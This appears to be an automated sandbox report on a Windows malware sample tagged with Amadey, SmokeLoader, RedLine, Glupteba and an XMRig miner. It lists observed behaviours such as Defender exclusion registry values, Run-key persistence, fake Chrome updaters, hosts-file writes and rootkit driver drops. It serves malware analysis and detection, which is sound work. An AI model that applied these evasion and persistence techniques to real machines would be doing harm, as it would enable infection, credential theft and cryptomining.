Malware Analysis Report

2025-08-10 17:38

Sample ID 230626-bdawnafd68
Target 12dc82a693eb598eb3aa521ffe54dc77.bin
SHA256 307c3e20e65556cfe4c2c0e0864a6b71fe0bb56cf8c3e1fc26890cf849925705
Tags
amadey fabookie gcleaner glupteba redline smokeloader 240623_rcn_11 up3 backdoor discovery dropper evasion infostealer loader persistence rootkit spyware stealer trojan upx xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

307c3e20e65556cfe4c2c0e0864a6b71fe0bb56cf8c3e1fc26890cf849925705

Threat Level: Known bad

The file 12dc82a693eb598eb3aa521ffe54dc77.bin was found to be: Known bad.

Malicious Activity Summary

amadey fabookie gcleaner glupteba redline smokeloader 240623_rcn_11 up3 backdoor discovery dropper evasion infostealer loader persistence rootkit spyware stealer trojan upx xmrig miner

Windows security bypass

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

RedLine

Amadey

GCleaner

Fabookie

xmrig

Modifies security service

Glupteba payload

Glupteba

Detect Fabookie payload

Modifies boot configuration data using bcdedit

XMRig Miner payload

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Stops running service(s)

Downloads MZ/PE file

Drops file in Drivers directory

Checks computer location settings

Windows security modification

UPX packed file

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Manipulates WinMonFS driver.

Manipulates WinMon driver.

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Modifies system certificate store

Detects videocard installed

Kills process with taskkill

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-26 01:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-26 01:01

Reported

2023-06-26 01:03

Platform

win7-20230621-en

Max time kernel

145s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

GCleaner

loader gcleaner

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters C:\Windows\System32\reg.exe N/A

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1928 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe C:\Windows\Explorer.EXE
PID 1928 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe C:\Windows\Explorer.EXE
PID 1928 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe C:\Windows\Explorer.EXE
PID 1928 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe C:\Windows\Explorer.EXE
PID 1928 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe C:\Windows\Explorer.EXE
PID 476 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 476 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 476 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 476 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1464 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 476 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1464 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1464 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1464 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1464 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1588 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1588 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1588 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1588 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1588 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 2104 created 1276 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2104 created 1276 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2104 created 1276 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2104 created 1276 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2104 created 1276 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2104 created 1276 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2424 created 1276 N/A C:\Windows\System32\conhost.exe C:\Windows\Explorer.EXE
PID 2068 created 1276 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2068 created 1276 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2068 created 1276 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2068 created 1276 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2068 created 1276 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2104 created 1276 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2068 created 1276 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Program Files\Notepad\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3419557010-3639509551-242374962-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419557010-3639509551-242374962-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files\Notepad\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Notepad\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20230626010155.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-551 = "North Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
